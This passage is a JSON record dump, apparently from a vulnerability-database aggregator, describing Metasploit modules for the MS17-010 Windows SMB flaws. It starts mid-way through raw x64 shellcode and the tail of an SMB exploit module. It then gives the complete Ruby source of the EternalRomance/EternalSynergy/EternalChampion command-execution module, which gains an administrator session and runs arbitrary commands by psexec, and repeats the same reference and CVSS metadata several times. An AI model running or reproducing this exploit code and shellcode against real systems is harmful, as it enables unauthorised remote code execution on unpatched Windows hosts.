\"\\x3E\\x48\\x8D\\x35\\xE9\\x00\\x00\\x00\\x31\\xC9\\x66\\x03\\x0D\\xD7\\x01\\x00\" \\\n \"\\x00\\x66\\x81\\xC1\\xF9\\x00\\xF3\\xA4\\x48\\x89\\xDE\\x48\\x81\\xC6\\x08\\x03\" \\\n \"\\x00\\x00\\x48\\x89\\xF1\\x48\\x8B\\x11\\x4C\\x29\\xE2\\x51\\x52\\x48\\x89\\xD1\" \\\n \"\\x48\\x83\\xEC\\x20\\x41\\xBB\\x26\\x40\\x36\\x9D\\xE8\\x09\\x01\\x00\\x00\\x48\" \\\n \"\\x83\\xC4\\x20\\x5A\\x59\\x48\\x85\\xC0\\x74\\x18\\x48\\x8B\\x80\\xC8\\x02\\x00\" \\\n \"\\x00\\x48\\x85\\xC0\\x74\\x0C\\x48\\x83\\xC2\\x4C\\x8B\\x02\\x0F\\xBA\\xE0\\x05\" \\\n \"\\x72\\x05\\x48\\x8B\\x09\\xEB\\xBE\\x48\\x83\\xEA\\x4C\\x49\\x89\\xD4\\x31\\xD2\" \\\n 
\"\\x80\\xC2\\x90\\x31\\xC9\\x41\\xBB\\x26\\xAC\\x50\\x91\\xE8\\xC8\\x00\\x00\\x00\" \\\n \"\\x48\\x89\\xC1\\x4C\\x8D\\x89\\x80\\x00\\x00\\x00\\x41\\xC6\\x01\\xC3\\x4C\\x89\" \\\n \"\\xE2\\x49\\x89\\xC4\\x4D\\x31\\xC0\\x41\\x50\\x6A\\x01\\x49\\x8B\\x06\\x50\\x41\" \\\n \"\\x50\\x48\\x83\\xEC\\x20\\x41\\xBB\\xAC\\xCE\\x55\\x4B\\xE8\\x98\\x00\\x00\\x00\" \\\n \"\\x31\\xD2\\x52\\x52\\x41\\x58\\x41\\x59\\x4C\\x89\\xE1\\x41\\xBB\\x18\\x38\\x09\" \\\n \"\\x9E\\xE8\\x82\\x00\\x00\\x00\\x4C\\x89\\xE9\\x41\\xBB\\x22\\xB7\\xB3\\x7D\\xE8\" \\\n \"\\x74\\x00\\x00\\x00\\x48\\x89\\xD9\\x41\\xBB\\x0D\\xE2\\x4D\\x85\\xE8\\x66\\x00\" \\\n \"\\x00\\x00\\x48\\x89\\xEC\\x5D\\x5B\\x41\\x5C\\x41\\x5D\\x41\\x5E\\x41\\x5F\\x5E\" \\\n \"\\xC3\\xE9\\xB5\\x00\\x00\\x00\\x4D\\x31\\xC9\\x31\\xC0\\xAC\\x41\\xC1\\xC9\\x0D\" \\\n \"\\x3C\\x61\\x7C\\x02\\x2C\\x20\\x41\\x01\\xC1\\x38\\xE0\\x75\\xEC\\xC3\\x31\\xD2\" \\\n \"\\x65\\x48\\x8B\\x52\\x60\\x48\\x8B\\x52\\x18\\x48\\x8B\\x52\\x20\\x48\\x8B\\x12\" \\\n \"\\x48\\x8B\\x72\\x50\\x48\\x0F\\xB7\\x4A\\x4A\\x45\\x31\\xC9\\x31\\xC0\\xAC\\x3C\" \\\n \"\\x61\\x7C\\x02\\x2C\\x20\\x41\\xC1\\xC9\\x0D\\x41\\x01\\xC1\\xE2\\xEE\\x45\\x39\" \\\n \"\\xD9\\x75\\xDA\\x4C\\x8B\\x7A\\x20\\xC3\\x4C\\x89\\xF8\\x41\\x51\\x41\\x50\\x52\" \\\n \"\\x51\\x56\\x48\\x89\\xC2\\x8B\\x42\\x3C\\x48\\x01\\xD0\\x8B\\x80\\x88\\x00\\x00\" \\\n \"\\x00\\x48\\x01\\xD0\\x50\\x8B\\x48\\x18\\x44\\x8B\\x40\\x20\\x49\\x01\\xD0\\x48\" \\\n \"\\xFF\\xC9\\x41\\x8B\\x34\\x88\\x48\\x01\\xD6\\xE8\\x78\\xFF\\xFF\\xFF\\x45\\x39\" \\\n \"\\xD9\\x75\\xEC\\x58\\x44\\x8B\\x40\\x24\\x49\\x01\\xD0\\x66\\x41\\x8B\\x0C\\x48\" \\\n \"\\x44\\x8B\\x40\\x1C\\x49\\x01\\xD0\\x41\\x8B\\x04\\x88\\x48\\x01\\xD0\\x5E\\x59\" \\\n \"\\x5A\\x41\\x58\\x41\\x59\\x41\\x5B\\x41\\x53\\xFF\\xE0\\x56\\x41\\x57\\x55\\x48\" \\\n \"\\x89\\xE5\\x48\\x83\\xEC\\x20\\x41\\xBB\\xDA\\x16\\xAF\\x92\\xE8\\x4D\\xFF\\xFF\" \\\n \"\\xFF\\x31\\xC9\\x51\\x51\\x51\\x51\\x41\\x59\\x4C\\x8D\\x05\\x1A\\x00\\x00\\x00\" \\\n 
\"\\x5A\\x48\\x83\\xEC\\x20\\x41\\xBB\\x46\\x45\\x1B\\x22\\xE8\\x68\\xFF\\xFF\\xFF\" \\\n \"\\x48\\x89\\xEC\\x5D\\x41\\x5F\\x5E\\xC3\" # \\x01\\x00\\xC3\"\n end\n\n # Sets common SMB1 Header values used by the various\n # packets in the exploit.\n #\n # @return [RubySMB::GenericPacket] the modified version of the packet\n def set_smb1_headers(packet, tree_id, user_id)\n packet.smb_header.flags2.read(\"\\x07\\xc0\")\n packet.smb_header.tid = tree_id\n packet.smb_header.uid = user_id\n packet.smb_header.pid_low = 65279\n packet.smb_header.mid = 64\n packet\n end\n\n # Returns the value to be passed to SMB clients for\n # the password. If the user has not supplied a password\n # it returns an empty string to trigger an anonymous\n # logon.\n #\n # @return [String] the password value\n def smb_pass\n if datastore['SMBPass'].present?\n datastore['SMBPass']\n else\n ''\n end\n end\n\n # Returns the value to be passed to SMB clients for\n # the username. If the user has not supplied a username\n # it returns an empty string to trigger an anonymous\n # logon.\n #\n # @return [String] the username value\n def smb_user\n if datastore['SMBUser'].present?\n datastore['SMBUser']\n else\n ''\n end\n end\n\n # Returns the value to be passed to SMB clients for\n # the domain. 
If the user has not supplied a domain\n # it returns an empty string to trigger an anonymous\n # logon.\n #\n # @return [String] the domain value\n def smb_domain\n if datastore['SMBDomain'].present?\n datastore['SMBDomain']\n else\n ''\n end\n end\nend\n", "metasploitReliability": "", "metasploitHistory": "", "_object_type": "robots.models.metasploit.MetasploitBulletin", "_object_types": ["robots.models.metasploit.MetasploitBulletin", "robots.models.base.Bulletin"], "immutableFields": [], "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "edition": 2, "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "142f691ada068c40ae71fdd0eac8502e"}, {"key": "cvss", "hash": "d726e774add6189e33cf2ea0c61a2ba5"}, {"key": "cvss2", "hash": "e8dbb4c019811b96da3443b871bd4b26"}, {"key": "cvss3", "hash": "732a831a7eed3955e8de18b2d8903bc8"}, {"key": "description", "hash": "e399617d745f01fecac811333e03113c"}, {"key": "href", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": 
"e80bef8ab7c34172a2f61c17200cdbec"}, {"key": "published", "hash": "e2dd14eb78ca67b48750e2bf14c1af6d"}, {"key": "references", "hash": "f1292e4e1bddcf376f3f8330160fdd6b"}, {"key": "reporter", "hash": "74798933f90c8c8a3dcac277d7c31e76"}, {"key": "title", "hash": "f01bc7580a1d9e48a4a0685bbba5abb4"}, {"key": "type", "hash": "6719951e37a5b7c4b959f8df50c9d641"}], "scheme": null}, {"id": "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "hash": "c8ab002a12aee6650518c6d0b37dc53dbf6c0456b6e6dfcdcb8f2dbbcb24fb02", "type": "metasploit", "bulletinFamily": "exploit", "title": "MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution", "description": "This module will exploit SMB with vulnerabilities in MS17-010 to achieve a write-what-where primitive. This will then be used to overwrite the connection session information with as an Administrator session. From there, the normal psexec command execution is done. Exploits a type confusion between Transaction and WriteAndX requests and a race condition in Transaction requests, as seen in the EternalRomance, EternalChampion, and EternalSynergy exploits. 
This exploit chain is more reliable than the EternalBlue exploit, but requires a named pipe.\n", "published": "2018-01-29T01:13:25", "modified": "2020-10-02T20:00:37", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0146", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0147", "https://github.com/worawit/MS17-010", "https://hitcon.org/2017/CMT/slide-files/d2_s2_r0.pdf", "https://blogs.technet.microsoft.com/srd/2017/06/29/eternal-champion-exploit-analysis/"], "cvelist": ["CVE-2017-0143", "CVE-2017-0146", "CVE-2017-0147"], "lastseen": "2020-10-13T19:19:22", "history": [{"bulletin": {"bulletinFamily": "exploit", "cvelist": ["CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143"], "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {}, "description": "This module will exploit SMB with vulnerabilities in MS17-010 to achieve a write-what-where primitive. This will then be used to overwrite the connection session information with as an Administrator session. From there, the normal psexec command execution is done. Exploits a type confusion between Transaction and WriteAndX requests and a race condition in Transaction requests, as seen in the EternalRomance, EternalChampion, and EternalSynergy exploits. 
This exploit chain is more reliable than the EternalBlue exploit, but requires a named pipe.\n", "edition": 1, "enchantments": {"dependencies": {"modified": "2020-10-13T19:19:22", "references": [{"idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"], "type": "attackerkb"}, {"idList": ["MS17_010", "ETERNALBLUE"], "type": "canvas"}, {"idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"], "type": "carbonblack"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143"], "type": "cve"}, {"idList": ["SMNTC-96709", "SMNTC-96707", "SMNTC-96703"], "type": "symantec"}, {"idList": ["SECURELIST:9E27BB3C9444305AA7FFD267587363A1"], "type": "securelist"}, {"idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"], "type": "ics"}, {"idList": ["SSV:92952", "SSV:92964"], "type": "seebug"}, {"idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"], "type": "talosblog"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF"], "type": "thn"}, {"idList": ["MS:CVE-2017-0146", "MS:CVE-2017-0143", "MS:CVE-2017-0147"], "type": "mscve"}, {"idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", 
"MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"], "type": "metasploit"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["MYHACK58:62201786371"], "type": "myhack58"}, {"idList": ["NMAP:SMB-VULN-MS17-010.NSE"], "type": "nmap"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:7E6831E46F8BB1882B752045F527ABE6"], "type": "trendmicroblog"}, {"idList": ["THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"], "type": "threatpost"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"], "type": "openvas"}, {"idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:2D677AA07C3BC24D8037E937830ACA0D", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:8F97D6443E5FED252FF64CE37A74709D"], "type": "saint"}, {"idList": ["KLA11902", "KLA10977", "KLA10979"], "type": "kaspersky"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2", "QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"], "type": "qualysblog"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}], "rev": 2}, "score": {"modified": "2020-10-13T19:19:22", "rev": 2, "value": 7.3, "vector": "NONE"}}, "hash": "8b4dacc9986d48181592f07e3d4c459fe41bb14f2a381862248fffd6862e127c", "hashmap": [{"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": 
"immutableFields"}, {"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "href"}, {"hash": "d726e774add6189e33cf2ea0c61a2ba5", "key": "cvss"}, {"hash": "7bf92dcded785b5598f61cda83fdc26f", "key": "title"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "74798933f90c8c8a3dcac277d7c31e76", "key": "reporter"}, {"hash": "7bc839b0566b34ac03da233f997066ff", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss2"}, {"hash": "e80bef8ab7c34172a2f61c17200cdbec", "key": "modified"}, {"hash": "6719951e37a5b7c4b959f8df50c9d641", "key": "type"}, {"hash": "b1b79302e85cd03f0ea3818121409a3e", "key": "published"}, {"hash": "0762dab7827371d2474b2f3149cd5d38", "key": "description"}, {"hash": "e6f53676ca888a6a837a24417efa2477", "key": "cvelist"}], "history": [], "href": "", "id": "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "immutableFields": [], "lastseen": "2020-10-13T19:19:22", "modified": "2020-10-02T20:00:37", "objectVersion": "1.5", "published": "2018-01-29T01:13:25", "references": ["https://blogs.technet.microsoft.com/srd/2017/06/29/eternal-champion-exploit-analysis/", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0147", "https://github.com/worawit/MS17-010", "https://hitcon.org/2017/CMT/slide-files/d2_s2_r0.pdf", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0146"], "reporter": "Rapid7", "title": "MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution", "type": "metasploit", "viewCount": 461}, "different_elements": ["cvss3", "cvss2"], "edition": 1, "lastseen": "2020-10-13T19:19:22"}, {"bulletin": {"bulletinFamily": "exploit", "cvelist": ["CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143"], "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "description": "This module will exploit SMB with vulnerabilities in MS17-010 to achieve a 
write-what-where primitive. This will then be used to overwrite the connection session information with as an Administrator session. From there, the normal psexec command execution is done. Exploits a type confusion between Transaction and WriteAndX requests and a race condition in Transaction requests, as seen in the EternalRomance, EternalChampion, and EternalSynergy exploits. This exploit chain is more reliable than the EternalBlue exploit, but requires a named pipe.\n", "enchantments": {"dependencies": {"modified": "2020-03-07T20:36:20", "references": [{"idList": ["KLA10977", "KLA10979"], "type": "kaspersky"}, {"idList": ["ICSMA-18-058-02"], "type": "ics"}, {"idList": ["MS17_010", "ETERNALBLUE"], "type": "canvas"}, {"idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"], "type": "carbonblack"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143"], "type": "cve"}, {"idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"], "type": "metasploit"}, {"idList": ["SMNTC-96709", "SMNTC-96707", "SMNTC-96703"], "type": "symantec"}, {"idList": ["SECURELIST:9E27BB3C9444305AA7FFD267587363A1"], "type": "securelist"}, {"idList": ["SSV:92952", "SSV:92964"], "type": "seebug"}, {"idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"], "type": "talosblog"}, {"idList": ["KB4013389"], "type": 
"mskb"}, {"idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF"], "type": "thn"}, {"idList": ["MS:CVE-2017-0146", "MS:CVE-2017-0143", "MS:CVE-2017-0147"], "type": "mscve"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["MYHACK58:62201786371"], "type": "myhack58"}, {"idList": ["NMAP:SMB-VULN-MS17-010.NSE"], "type": "nmap"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:7E6831E46F8BB1882B752045F527ABE6"], "type": "trendmicroblog"}, {"idList": ["THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"], "type": "threatpost"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"], "type": "openvas"}, {"idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:2D677AA07C3BC24D8037E937830ACA0D", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:8F97D6443E5FED252FF64CE37A74709D"], "type": "saint"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2", "QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"], "type": "qualysblog"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}]}, "score": {"modified": "2020-03-07T20:36:20", "value": 7.2, "vector": "NONE"}}, "hash": "032f89b8b6efb729d4cc700fbcf6660e", "history": 
[], "href": "", "id": "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "lastseen": "2020-03-07T20:36:20", "metasploitHistory": "", "metasploitReliability": "", "modified": "2019-05-23T01:05:44", "objectVersion": "1.4", "published": "2018-01-29T01:13:25", "references": ["https://blogs.technet.microsoft.com/srd/2017/06/29/eternal-champion-exploit-analysis/", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0147", "https://github.com/worawit/MS17-010", "https://hitcon.org/2017/CMT/slide-files/d2_s2_r0.pdf", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0146"], "reporter": "Rapid7", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::SMB::Client::Psexec_MS17_010\n include Msf::Exploit::Remote::SMB::Client::Psexec\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution',\n 'Description' => %q{\n This module will exploit SMB with vulnerabilities in MS17-010 to achieve a write-what-where\n primitive. This will then be used to overwrite the connection session information with as an\n Administrator session. From there, the normal psexec command execution is done.\n\n Exploits a type confusion between Transaction and WriteAndX requests and a race condition in\n Transaction requests, as seen in the EternalRomance, EternalChampion, and EternalSynergy\n exploits. 
This exploit chain is more reliable than the EternalBlue exploit, but requires a\n named pipe.\n },\n\n 'Author' => [\n 'sleepya', # zzz_exploit idea and offsets\n 'zerosum0x0',\n 'Shadow Brokers',\n 'Equation Group'\n ],\n\n 'License' => MSF_LICENSE,\n 'References' => [\n [ 'MSB', 'MS17-010' ],\n [ 'CVE', '2017-0143'], # EternalRomance/EternalSynergy - Type confusion between WriteAndX and Transaction requests\n [ 'CVE', '2017-0146'], # EternalChampion/EternalSynergy - Race condition with Transaction requests\n [ 'CVE', '2017-0147'], # for EternalRomance reference\n [ 'URL', 'https://github.com/worawit/MS17-010' ],\n [ 'URL', 'https://hitcon.org/2017/CMT/slide-files/d2_s2_r0.pdf' ],\n [ 'URL', 'https://blogs.technet.microsoft.com/srd/2017/06/29/eternal-champion-exploit-analysis/' ],\n ],\n 'DisclosureDate' => 'Mar 14 2017',\n 'Notes' =>\n {\n 'AKA' => [\n 'ETERNALSYNERGY',\n 'ETERNALROMANCE',\n 'ETERNALCHAMPION',\n 'ETERNALBLUE' # does not use any CVE from Blue, but Search should show this, it is preferred\n ]\n }\n ))\n\n register_options([\n OptString.new('SMBSHARE', [true, 'The name of a writeable share on the server', 'C$']),\n OptString.new('COMMAND', [true, 'The command you want to execute on the remote host', 'net group \"Domain Admins\" /domain']),\n OptString.new('RPORT', [true, 'The Target port', 445]),\n OptString.new('WINPATH', [true, 'The name of the remote Windows directory', 'WINDOWS']),\n ])\n\n register_advanced_options([\n OptString.new('FILEPREFIX', [false, 'Add a custom prefix to the temporary files','']),\n OptInt.new('DELAY', [true, 'Wait this many seconds before reading output and cleaning up', 0]),\n OptInt.new('RETRY', [true, 'Retry this many times to check if the process is complete', 0]),\n ])\n end\n\n def run_host(ip)\n begin\n if datastore['SMBUser'].present?\n print_status(\"Authenticating to #{ip} as user '#{splitname(datastore['SMBUser'])}'...\")\n end\n eternal_pwn(ip) # exploit Admin session\n smb_pwn(ip) # psexec\n\n rescue 
::Msf::Exploit::Remote::SMB::Client::Psexec_MS17_010::MS17_010_Error => e\n print_error(\"#{e.message}\")\n rescue ::Errno::ECONNRESET,\n ::Rex::HostUnreachable,\n ::Rex::Proto::SMB::Exceptions::LoginError,\n ::Rex::ConnectionTimeout,\n ::Rex::ConnectionRefused => e\n print_error(\"#{e.class}: #{e.message}\")\n rescue => error\n print_error(error.class.to_s)\n print_error(error.message)\n print_error(error.backtrace.join(\"\\n\"))\n ensure\n eternal_cleanup() # restore session\n end\n end\n\n def smb_pwn(ip)\n text = \"\\\\#{datastore['WINPATH']}\\\\Temp\\\\#{datastore['FILEPREFIX']}#{Rex::Text.rand_text_alpha(16)}.txt\"\n bat = \"\\\\#{datastore['WINPATH']}\\\\Temp\\\\#{datastore['FILEPREFIX']}#{Rex::Text.rand_text_alpha(16)}.bat\"\n @smbshare = datastore['SMBSHARE']\n @ip = ip\n\n # Try and authenticate with given credentials\n output = execute_command_with_output(text, bat, datastore['COMMAND'], @smbshare, @ip, datastore['RETRY'], datastore['DELAY'])\n\n # Report output\n print_good(\"Command completed successfully!\")\n print_status(\"Output for \\\"#{datastore['COMMAND']}\\\":\\n\")\n print_line(\"#{output}\\n\")\n report_note(\n :rhost => datastore['RHOSTS'],\n :rport => datastore['RPORT'],\n :type => \"psexec_command\",\n :name => datastore['COMMAND'],\n :data => output\n )\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/admin/smb/ms17_010_command.rb", "title": "MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution", "type": "metasploit", "viewCount": 266}, "differentElements": ["published", "modified"], "edition": 138, "lastseen": "2020-03-07T20:36:20"}, {"bulletin": {"bulletinFamily": "exploit", "cvelist": ["CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143"], "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "description": "This module will exploit SMB with vulnerabilities in MS17-010 to achieve a write-what-where primitive. 
This will then be used to overwrite the connection session information with as an Administrator session. From there, the normal psexec command execution is done. Exploits a type confusion between Transaction and WriteAndX requests and a race condition in Transaction requests, as seen in the EternalRomance, EternalChampion, and EternalSynergy exploits. This exploit chain is more reliable than the EternalBlue exploit, but requires a named pipe.\n", "enchantments": {"dependencies": {"modified": "2020-07-01T18:01:27", "references": [{"idList": ["KLA10977", "KLA10979"], "type": "kaspersky"}, {"idList": ["MS17_010", "ETERNALBLUE"], "type": "canvas"}, {"idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"], "type": "carbonblack"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143"], "type": "cve"}, {"idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"], "type": "metasploit"}, {"idList": ["SMNTC-96709", "SMNTC-96707", "SMNTC-96703"], "type": "symantec"}, {"idList": ["SECURELIST:9E27BB3C9444305AA7FFD267587363A1"], "type": "securelist"}, {"idList": ["ICSMA-20-170-01", 